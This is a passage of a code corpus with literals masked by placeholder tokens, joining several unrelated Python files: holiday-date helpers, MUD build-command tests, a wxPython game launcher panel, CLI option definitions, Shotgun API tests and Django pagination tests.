<NUM_LIT:12> , <NUM_LIT> ) <EOL> def christeve ( year = None ) : <EOL> return yesterday ( christmas ( year ) ) <EOL> def mother ( year = None ) : <EOL> """<STR_LIT>""" <EOL> may_first = datetime . date ( _year , <NUM_LIT:5> , <NUM_LIT:1> ) if not year else datetime . date ( int ( year ) , <NUM_LIT:5> , <NUM_LIT:1> ) <EOL> weekday_seq = may_first . weekday ( ) <EOL> return datetime . date ( may_first . year , <NUM_LIT:5> , ( <NUM_LIT> - weekday_seq ) ) <EOL> def father ( year = None ) : <EOL> """<STR_LIT>""" <EOL> june_first = datetime . date ( _year , <NUM_LIT:6> , <NUM_LIT:1> ) if not year else datetime . date ( int ( year ) , <NUM_LIT:6> , <NUM_LIT:1> ) <EOL> weekday_seq = june_first . weekday ( ) <EOL> return datetime . date ( june_first . year , <NUM_LIT:6> , ( <NUM_LIT> - weekday_seq ) ) <EOL> def halloween ( year = None ) : <EOL> return lastday ( month = <NUM_LIT:10> ) if not year else lastday ( year , <NUM_LIT:10> ) <EOL> def easter ( year = None ) : <EOL> """<STR_LIT>""" <EOL> y = int ( year ) if year else _year <EOL> n = y - <NUM_LIT> <EOL> a = n % <NUM_LIT> <EOL> q = n // <NUM_LIT:4> <EOL> b = ( <NUM_LIT:7> * a + <NUM_LIT:1> ) // <NUM_LIT> <EOL> m = ( <NUM_LIT:11> * a + <NUM_LIT:4> - b ) % <NUM_LIT> <EOL> w = ( n + q + <NUM_LIT> - m ) % <NUM_LIT:7> <EOL> d = <NUM_LIT> - m - w <EOL> if d > <NUM_LIT:0> : <EOL> return datetime . date ( y , <NUM_LIT:4> , d ) <EOL> else : <EOL> return datetime . date ( y , <NUM_LIT:3> , ( <NUM_LIT> - d ) ) <EOL> def thanks ( year = None ) : <EOL> """<STR_LIT>""" <EOL> nov_first = datetime . date ( _year , <NUM_LIT:11> , <NUM_LIT:1> ) if not year else datetime . date ( int ( year ) , <NUM_LIT:11> , <NUM_LIT:1> ) <EOL> weekday_seq = nov_first . weekday ( ) <EOL> if weekday_seq > <NUM_LIT:3> : <EOL> current_day = <NUM_LIT:32> - weekday_seq <EOL> else : <EOL> current_day = <NUM_LIT> - weekday_seq <EOL> return datetime . date ( nov_first . year , <NUM_LIT:11> , current_day ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print ( bp ( '<STR_LIT>' ) ) </s>
<s> from shinymud . lib . sport_plugins import SportError <EOL> import os <EOL> def transport ( world , shinydata , filename , path ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( path ) : <EOL> try : <EOL> os . mkdir ( path ) <EOL> except Exception , e : <EOL> world . log . error ( '<STR_LIT>' + str ( e ) ) <EOL> raise SportError ( '<STR_LIT>' ) <EOL> filepath = os . path . join ( path , filename ) <EOL> try : <EOL> f = open ( filepath , '<STR_LIT:w>' ) <EOL> except IOError , e : <EOL> world . log . debug ( str ( e ) ) <EOL> raise SportError ( '<STR_LIT>' ) <EOL> else : <EOL> f . write ( shinydata ) <EOL> finally : <EOL> f . close ( ) <EOL> return '<STR_LIT>' % filepath </s>
<s> from shinytest import ShinyTestCase <EOL> import os <EOL> class TestBuildCommands ( ShinyTestCase ) : <EOL> def setUp ( self ) : <EOL> ShinyTestCase . setUp ( self ) <EOL> from shinymud . data import config <EOL> from shinymud . models . player import Player <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import build_list <EOL> from shinymud . modes . build_mode import BuildMode <EOL> self . bob = Player ( ( '<STR_LIT>' , '<STR_LIT:bar>' ) ) <EOL> self . bob . mode = None <EOL> self . bob . playerize ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> self . world . player_add ( self . bob ) <EOL> self . bob . mode = BuildMode ( self . bob ) <EOL> self . bob . permissions = self . bob . permissions | config . BUILDER <EOL> def _clean_test_file ( self , path ) : <EOL> try : <EOL> os . remove ( path ) <EOL> except Exception , e : <EOL> self . world . log . debug ( '<STR_LIT>' + str ( e ) ) <EOL> def test_edit_command ( self ) : <EOL> from shinymud . data import config <EOL> from shinymud . models . player import Player <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import Edit <EOL> from shinymud . modes . build_mode import BuildMode <EOL> area = Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> Edit ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> empty = '<STR_LIT>' <EOL> self . assertTrue ( empty in self . bob . outq ) <EOL> fail = '<STR_LIT>' <EOL> Edit ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertTrue ( fail in self . bob . outq ) <EOL> success = '<STR_LIT>' <EOL> area . builders . append ( '<STR_LIT>' ) <EOL> Edit ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertEqual ( self . bob . mode . edit_area , area ) <EOL> self . assertTrue ( success in self . bob . outq ) <EOL> def test_link_command ( self ) : <EOL> from shinymud . data import config <EOL> from shinymud . models . player import Player <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import Edit , Link <EOL> from shinymud . modes . build_mode import BuildMode <EOL> area = Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> room1 = area . new_room ( ) <EOL> area . builders . append ( '<STR_LIT>' ) <EOL> Edit ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> Edit ( self . bob , '<STR_LIT>' % room1 . id , '<STR_LIT>' ) . run ( ) <EOL> Link ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> north = room1 . exits . get ( '<STR_LIT>' ) <EOL> self . assertTrue ( north ) <EOL> self . assertEqual ( north . linked_exit , '<STR_LIT>' ) <EOL> self . bob . outq = [ ] <EOL> room2 = area . new_room ( ) <EOL> Link ( self . bob , '<STR_LIT>' % room2 . id , '<STR_LIT>' ) . run ( ) <EOL> self . bob . world . log . debug ( self . bob . outq ) <EOL> east = room1 . exits . get ( '<STR_LIT>' ) <EOL> self . bob . world . log . debug ( east ) <EOL> self . assertTrue ( east ) <EOL> self . assertEqual ( east . linked_exit , '<STR_LIT>' ) <EOL> self . assertEqual ( east . to_room , room2 ) <EOL> area2 = Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> cake_room = area2 . new_room ( ) <EOL> Link ( self . bob , <EOL> '<STR_LIT>' % ( cake_room . id , <EOL> cake_room . area . name ) , <EOL> '<STR_LIT>' ) . run ( ) <EOL> self . bob . world . log . debug ( self . bob . outq ) <EOL> west = room1 . exits . get ( '<STR_LIT>' ) <EOL> self . assertTrue ( west ) <EOL> self . assertEqual ( west . linked_exit , '<STR_LIT>' ) <EOL> self . assertEqual ( west . to_room , cake_room ) <EOL> self . bob . outq = [ ] <EOL> Link ( self . bob , <EOL> '<STR_LIT>' % ( cake_room . id , <EOL> cake_room . area . name ) , <EOL> '<STR_LIT>' ) . run ( ) <EOL> self . bob . world . log . debug ( self . bob . outq ) <EOL> fail = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertTrue ( fail in self . bob . outq ) <EOL> def test_unlink_command ( self ) : <EOL> from shinymud . data import config <EOL> from shinymud . models . player import Player <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import Edit , Link , Unlink <EOL> from shinymud . modes . build_mode import BuildMode <EOL> area = Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> room1 = area . new_room ( ) <EOL> area . builders . append ( '<STR_LIT>' ) <EOL> Edit ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> Edit ( self . bob , '<STR_LIT>' % room1 . id , '<STR_LIT>' ) . run ( ) <EOL> Link ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> room2 = room1 . exits . get ( '<STR_LIT>' ) . to_room <EOL> self . assertTrue ( room2 . exits [ '<STR_LIT>' ] . linked_exit ) <EOL> self . assertTrue ( room1 . exits [ '<STR_LIT>' ] . linked_exit ) <EOL> Unlink ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertEqual ( room1 . exits . get ( '<STR_LIT>' ) , None ) <EOL> self . assertEqual ( room2 . exits . get ( '<STR_LIT>' ) , None ) <EOL> def test_export_command ( self ) : <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import Export <EOL> from shinymud . data . config import AREAS_EXPORT_DIR <EOL> a = Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> Export ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . world . log . debug ( self . bob . outq ) <EOL> self . assertTrue ( '<STR_LIT>' in self . bob . outq ) <EOL> error = '<STR_LIT>' <EOL> Export ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertTrue ( error in self . bob . outq ) <EOL> error = '<STR_LIT>' <EOL> Export ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertTrue ( error in self . bob . outq ) <EOL> self . assertTrue ( self . world . area_exists ( '<STR_LIT>' ) ) <EOL> Export ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . world . log . debug ( self . bob . outq ) <EOL> self . assertTrue ( self . bob . outq [ - <NUM_LIT:1> ] . startswith ( '<STR_LIT>' ) ) <EOL> self . assertTrue ( os . path . exists ( AREAS_EXPORT_DIR + '<STR_LIT>' ) ) <EOL> self . _clean_test_file ( AREAS_EXPORT_DIR + '<STR_LIT>' ) <EOL> def test_import_command ( self ) : <EOL> from shinymud . models . area import Area <EOL> from shinymud . commands . build_commands import Import , Export <EOL> from shinymud . data . config import AREAS_EXPORT_DIR , AREAS_IMPORT_DIR <EOL> Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:description>' : '<STR_LIT>' } ) <EOL> Area . create ( { '<STR_LIT:name>' : '<STR_LIT>' } ) <EOL> Export ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . assertTrue ( os . path . exists ( AREAS_EXPORT_DIR + '<STR_LIT>' ) ) <EOL> self . world . destroy_area ( '<STR_LIT>' , '<STR_LIT:test>' ) <EOL> self . assertFalse ( self . world . area_exists ( '<STR_LIT>' ) ) <EOL> Import ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> self . world . log . debug ( self . bob . outq ) <EOL> self . assertTrue ( '<STR_LIT>' in self . bob . outq ) <EOL> Import ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> error = '<STR_LIT>' <EOL> self . assertTrue ( error in self . bob . outq ) <EOL> Import ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> error = '<STR_LIT>' <EOL> self . assertTrue ( error in self . bob . outq ) <EOL> Import ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> b = self . world . get_area ( '<STR_LIT>' ) <EOL> self . world . log . debug ( self . bob . outq ) <EOL> self . assertTrue ( b ) <EOL> self . assertEqual ( b . description , '<STR_LIT>' ) <EOL> self . world . destroy_area ( '<STR_LIT>' , '<STR_LIT:test>' ) <EOL> Import ( self . bob , '<STR_LIT>' , '<STR_LIT>' ) . run ( ) <EOL> error = '<STR_LIT>' <EOL> self . world . log . debug ( self . bob . outq ) <EOL> self . assertTrue ( error in self . bob . outq ) <EOL> self . _clean_test_file ( AREAS_EXPORT_DIR + '<STR_LIT>' ) </s>
<s> import wx <EOL> import wx . grid <EOL> from eve_mlp . common import LaunchConfig <EOL> import wx . lib . agw . ultimatelistctrl as ulc <EOL> class LauncherPanel ( wx . Panel ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parent , config ) : <EOL> wx . Panel . __init__ ( self , parent ) <EOL> self . parent = parent <EOL> self . config = config <EOL> self . main = parent <EOL> self . selected_id = <NUM_LIT:0> <EOL> box = wx . BoxSizer ( wx . VERTICAL ) <EOL> box . SetMinSize ( ( <NUM_LIT> , <NUM_LIT:200> ) ) <EOL> self . lc_grid = wx . FlexGridSizer ( <NUM_LIT:0> , <NUM_LIT:3> ) <EOL> self . lc_grid . AddGrowableCol ( <NUM_LIT:1> ) <EOL> launch_sel = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> add_setup = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> del_setup = wx . Button ( self , - <NUM_LIT:1> , "<STR_LIT>" ) <EOL> self . Bind ( wx . EVT_BUTTON , self . OnLaunchSel , launch_sel ) <EOL> self . Bind ( wx . EVT_BUTTON , self . OnAddSetup , add_setup ) <EOL> self . Bind ( wx . EVT_BUTTON , self . OnDelSetup , del_setup ) <EOL> box . Add ( self . lc_grid , <NUM_LIT:1> , wx . EXPAND ) <EOL> box . Add ( launch_sel , <NUM_LIT:0> , wx . EXPAND ) <EOL> box . Add ( add_setup , <NUM_LIT:0> , wx . EXPAND ) <EOL> box . Add ( del_setup , <NUM_LIT:0> , wx . EXPAND ) <EOL> self . SetSizer ( box ) <EOL> self . Layout ( ) <EOL> self . update ( ) <EOL> def update ( self ) : <EOL> self . lc_grid . Clear ( True ) <EOL> for n , lc in enumerate ( self . config . launches ) : <EOL> check = wx . CheckBox ( self , <NUM_LIT> + n ) <EOL> check . SetValue ( lc . selected ) <EOL> self . Bind ( wx . EVT_CHECKBOX , self . OnCheck , check ) <EOL> self . lc_grid . Add ( check , <NUM_LIT:0> , wx . ALIGN_CENTER_VERTICAL ) <EOL> name = wx . Button ( self , <NUM_LIT> + n , lc . confname , style = wx . NO_BORDER | wx . BU_LEFT ) <EOL> if n == self . selected_id : <EOL> f = name . GetFont ( ) <EOL> name . SetFont ( wx . Font ( f . GetPointSize ( ) , f . GetFamily ( ) , f . GetStyle ( ) , wx . BOLD ) ) <EOL> self . Bind ( wx . EVT_BUTTON , self . OnItemSelected , name ) <EOL> self . lc_grid . Add ( name , <NUM_LIT:1> , wx . EXPAND | wx . ALIGN_CENTER_VERTICAL ) <EOL> button = wx . Button ( self , <NUM_LIT> + n , label = "<STR_LIT>" ) <EOL> self . Bind ( wx . EVT_BUTTON , self . OnLaunch , button ) <EOL> self . lc_grid . Add ( button ) <EOL> self . Layout ( ) <EOL> def OnCheck ( self , evt ) : <EOL> uid = evt . GetId ( ) - <NUM_LIT> <EOL> self . config . launches [ uid ] . selected = evt . IsChecked ( ) <EOL> def OnItemSelected ( self , evt ) : <EOL> uid = evt . GetId ( ) - <NUM_LIT> <EOL> self . main . OnLaunchConfigSelected ( uid ) <EOL> self . selected_id = uid <EOL> self . update ( ) <EOL> def OnLaunch ( self , evt ) : <EOL> uid = evt . GetId ( ) - <NUM_LIT> <EOL> self . main . launch ( self . config . launches [ uid ] ) <EOL> def OnLaunchAll ( self , evt ) : <EOL> for launch_config in self . config . launches : <EOL> self . main . launch ( launch_config ) <EOL> def OnLaunchSel ( self , evt ) : <EOL> for launch_config in self . config . launches : <EOL> if launch_config . selected : <EOL> self . main . launch ( launch_config ) <EOL> def OnAddSetup ( self , evt ) : <EOL> self . config . launches . append ( LaunchConfig ( self . config . defaults , { "<STR_LIT>" : "<STR_LIT>" } ) ) <EOL> self . main . OnLaunchConfigSelected ( len ( self . config . launches ) - <NUM_LIT:1> ) <EOL> self . update ( ) <EOL> def OnDelSetup ( self , evt ) : <EOL> del self . config . launches [ self . selected_id ] <EOL> if len ( self . config . launches ) == <NUM_LIT:0> : <EOL> self . config . launches . append ( LaunchConfig ( self . config . defaults , { "<STR_LIT>" : "<STR_LIT>" } ) ) <EOL> self . selected_id = <NUM_LIT:0> <EOL> self . main . OnLaunchConfigSelected ( <NUM_LIT:0> ) <EOL> self . update ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import chronos <EOL> import click <EOL> from shpkpr . cli . entrypoint import CONTEXT_SETTINGS <EOL> from shpkpr . marathon import MarathonClient <EOL> from shpkpr . mesos import MesosClient <EOL> application_id = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> required = True , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> completed = click . option ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> is_flag = True , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> cpus = click . option ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> type = float , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> dry_run = click . option ( <EOL> '<STR_LIT>' , <EOL> is_flag = True , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> env_prefix = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> default = CONTEXT_SETTINGS [ '<STR_LIT>' ] , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> follow = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> is_flag = True , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> force = click . option ( <EOL> '<STR_LIT>' , <EOL> is_flag = True , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> instances = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> type = int , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> lines = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> type = int , <EOL> help = '<STR_LIT>' , <EOL> default = <NUM_LIT:10> , <EOL> ) <EOL> marathon_client = click . option ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> required = True , <EOL> help = "<STR_LIT>" , <EOL> callback = lambda c , p , v : MarathonClient ( v ) <EOL> ) <EOL> mem = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> type = int , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> mesos_client = click . option ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> required = True , <EOL> help = "<STR_LIT>" , <EOL> callback = lambda c , p , v : MesosClient ( v ) <EOL> ) <EOL> stream = click . option ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> help = '<STR_LIT>' , <EOL> default = "<STR_LIT>" , <EOL> ) <EOL> template_path = click . option ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> type = str , <EOL> default = os . getcwd ( ) , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> template_names = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> type = str , <EOL> required = True , <EOL> help = "<STR_LIT>" , <EOL> multiple = True , <EOL> ) <EOL> chronos_client = click . option ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> envvar = "<STR_LIT>" . format ( CONTEXT_SETTINGS [ '<STR_LIT>' ] ) , <EOL> required = True , <EOL> help = '<STR_LIT>' , <EOL> callback = lambda c , p , v : chronos . connect ( [ v ] ) , <EOL> ) <EOL> job_name = click . option ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> type = str , <EOL> help = '<STR_LIT>' , <EOL> ) </s>
<s> import functools <EOL> import os <EOL> import pytest <EOL> from click . testing import CliRunner <EOL> from shpkpr . cli . entrypoint import cli <EOL> @ pytest . fixture ( scope = "<STR_LIT>" ) <EOL> def env ( ) : <EOL> env = { <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> "<STR_LIT>" : os . environ . get ( "<STR_LIT>" , None ) , <EOL> } <EOL> assert None not in env . values ( ) <EOL> return env <EOL> @ pytest . fixture <EOL> def runner ( ) : <EOL> runner = CliRunner ( ) <EOL> return functools . partial ( runner . invoke , cli ) </s>
<s> """<STR_LIT>""" <EOL> import base <EOL> import random <EOL> import shotgun_api3 <EOL> class TestShotgunApiLong ( base . LiveTestBase ) : <EOL> def test_automated_find ( self ) : <EOL> """<STR_LIT>""" <EOL> all_entities = self . sg . schema_entity_read ( ) . keys ( ) <EOL> direction = "<STR_LIT>" <EOL> filter_operator = "<STR_LIT:all>" <EOL> limit = <NUM_LIT:1> <EOL> page = <NUM_LIT:1> <EOL> for entity_type in all_entities : <EOL> if entity_type in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> continue <EOL> print "<STR_LIT>" , entity_type <EOL> fields = self . sg . schema_field_read ( entity_type ) <EOL> if not fields : <EOL> print "<STR_LIT>" % ( entity_type , ) <EOL> continue <EOL> order_field = None <EOL> for field_name , field in fields . iteritems ( ) : <EOL> if field [ '<STR_LIT>' ] [ "<STR_LIT:value>" ] != '<STR_LIT>' : <EOL> order_field = field_name <EOL> break <EOL> order = [ { '<STR_LIT>' : order_field , '<STR_LIT>' : direction } ] <EOL> if "<STR_LIT>" in fields : <EOL> filters = [ [ '<STR_LIT>' , '<STR_LIT>' , self . project ] ] <EOL> else : <EOL> filters = [ ] <EOL> records = self . sg . find ( entity_type , filters , fields = fields . keys ( ) , <EOL> order = order , filter_operator = filter_operator , <EOL> limit = limit , page = page ) <EOL> self . assertTrue ( isinstance ( records , list ) ) <EOL> if filter_operator == "<STR_LIT:all>" : <EOL> filter_operator = "<STR_LIT>" <EOL> else : <EOL> filter_operator = "<STR_LIT:all>" <EOL> if direction == "<STR_LIT>" : <EOL> direction = "<STR_LIT>" <EOL> else : <EOL> direction = "<STR_LIT>" <EOL> limit = ( limit % <NUM_LIT:5> ) + <NUM_LIT:1> <EOL> page = ( page % <NUM_LIT:3> ) + <NUM_LIT:1> <EOL> def test_schema ( self ) : <EOL> """<STR_LIT>""" <EOL> schema = self . sg . schema_entity_read ( ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> schema = self . sg . schema_read ( ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> schema = self . sg . schema_field_read ( "<STR_LIT>" ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> schema = self . sg . schema_field_read ( "<STR_LIT>" , field_name = "<STR_LIT:user>" ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( "<STR_LIT:user>" in schema ) <EOL> human_field_name = "<STR_LIT>" + str ( random . getrandbits ( <NUM_LIT> ) ) <EOL> properties = { "<STR_LIT:description>" : "<STR_LIT>" } <EOL> new_field_name = self . sg . schema_field_create ( "<STR_LIT>" , "<STR_LIT>" , human_field_name , <EOL> properties = properties ) <EOL> properties = { "<STR_LIT:description>" : "<STR_LIT>" } <EOL> ret_val = self . sg . schema_field_update ( "<STR_LIT>" , <EOL> new_field_name , <EOL> properties ) <EOL> self . assertTrue ( ret_val ) <EOL> ret_val = self . sg . schema_field_delete ( "<STR_LIT>" , new_field_name ) <EOL> self . assertTrue ( ret_val ) <EOL> def test_schema_with_project ( self ) : <EOL> """<STR_LIT>""" <EOL> project_entity = { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT:id>' : <NUM_LIT:0> } <EOL> if not self . sg . server_caps . version or self . sg . server_caps . version < ( <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> self . assertRaises ( shotgun_api3 . ShotgunError , self . sg . schema_entity_read , project_entity ) <EOL> self . assertRaises ( shotgun_api3 . ShotgunError , self . sg . schema_read , project_entity ) <EOL> self . assertRaises ( shotgun_api3 . ShotgunError , self . sg . schema_field_read , '<STR_LIT>' , None , project_entity ) <EOL> self . assertRaises ( shotgun_api3 . ShotgunError , self . sg . schema_field_read , '<STR_LIT>' , '<STR_LIT:user>' , project_entity ) <EOL> else : <EOL> schema = self . sg . schema_entity_read ( project_entity ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( '<STR_LIT>' in schema ) <EOL> self . assertTrue ( '<STR_LIT>' in schema [ '<STR_LIT>' ] ) <EOL> schema = self . sg . schema_read ( project_entity ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( '<STR_LIT>' in schema ) <EOL> self . assertFalse ( '<STR_LIT>' in schema . keys ( ) ) <EOL> schema = self . sg . schema_field_read ( '<STR_LIT>' , project_entity = project_entity ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( '<STR_LIT:user>' in schema ) <EOL> self . assertTrue ( '<STR_LIT>' in schema [ '<STR_LIT:user>' ] ) <EOL> schema = self . sg . schema_field_read ( '<STR_LIT>' , '<STR_LIT:user>' , project_entity ) <EOL> self . assertTrue ( schema , dict ) <EOL> self . assertTrue ( len ( schema ) > <NUM_LIT:0> ) <EOL> self . assertTrue ( '<STR_LIT:user>' in schema ) <EOL> self . assertTrue ( '<STR_LIT>' in schema [ '<STR_LIT:user>' ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> base . unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import string <EOL> import sys <EOL> import xml . etree . ElementTree as etree <EOL> from django . template import ( <EOL> Context , <EOL> Template , <EOL> TemplateSyntaxError , <EOL> ) <EOL> from django . test import TestCase <EOL> from django . test . client import RequestFactory <EOL> from django . utils import unittest <EOL> from el_pagination . exceptions import PaginationError <EOL> from el_pagination . models import PageList <EOL> from el_pagination . settings import ( <EOL> PAGE_LABEL , <EOL> PER_PAGE , <EOL> ) <EOL> from el_pagination . tests import make_model_instances <EOL> skip_if_old_etree = unittest . skipIf ( <EOL> sys . version_info < ( <NUM_LIT:2> , <NUM_LIT:7> ) , '<STR_LIT>' ) <EOL> class TemplateTagsTestMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . factory = RequestFactory ( ) <EOL> def render ( self , request , contents , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> template = Template ( '<STR_LIT>' + contents ) <EOL> context_data = kwargs . copy ( ) if kwargs else { '<STR_LIT>' : range ( <NUM_LIT> ) } <EOL> context_data [ '<STR_LIT>' ] = request <EOL> context = Context ( context_data ) <EOL> html = template . render ( context ) <EOL> return html . strip ( ) , context <EOL> def request ( self , url = '<STR_LIT:/>' , page = None , data = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> querydict = { } if data is None else data <EOL> querydict . update ( kwargs ) <EOL> if page is not None : <EOL> querydict [ PAGE_LABEL ] = page <EOL> return self . factory . get ( url , querydict ) <EOL> class EtreeTemplateTagsTestMixin ( TemplateTagsTestMixin ) : <EOL> """<STR_LIT>""" <EOL> def render ( self , request , contents , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> html , _ = super ( EtreeTemplateTagsTestMixin , self ) . render ( <EOL> request , contents , ** kwargs ) <EOL> if html : <EOL> return etree . fromstring ( '<STR_LIT>' . format ( html ) ) <EOL> class PaginateTestMixin ( TemplateTagsTestMixin ) : <EOL> """<STR_LIT>""" <EOL> def assertPaginationNumQueries ( self , num_queries , template , queryset = None ) : <EOL> """<STR_LIT>""" <EOL> if queryset is None : <EOL> queryset = make_model_instances ( <NUM_LIT> ) <EOL> request = self . request ( ) <EOL> with self . assertNumQueries ( num_queries ) : <EOL> _ , context = self . render ( request , template , objects = queryset ) <EOL> objects = list ( context [ '<STR_LIT>' ] ) <EOL> return objects <EOL> def assertRangeEqual ( self , expected , actual ) : <EOL> """<STR_LIT>""" <EOL> self . assertListEqual ( list ( expected ) , list ( actual ) ) <EOL> def render ( self , request , contents , ** kwargs ) : <EOL> text = string . Template ( contents ) . substitute ( tagname = self . tagname ) <EOL> return super ( PaginateTestMixin , self ) . render ( request , text , ** kwargs ) <EOL> def test_object_list ( self ) : <EOL> template = '<STR_LIT>' <EOL> html , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( PER_PAGE ) , context [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , html ) <EOL> def test_per_page_argument ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( self . request ( ) , template ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:20> ) , context [ '<STR_LIT>' ] ) <EOL> def test_per_page_argument_as_variable ( self ) : <EOL> template = '<STR_LIT>' <EOL> _ , context = self . render ( <EOL> self . request ( ) , template , entries = range ( <NUM_LIT> ) , per_page = <NUM_LIT:5> ) <EOL> self . assertRangeEqual ( range ( <NUM_LIT:5> ) , context [ '<STR_LIT>' ] 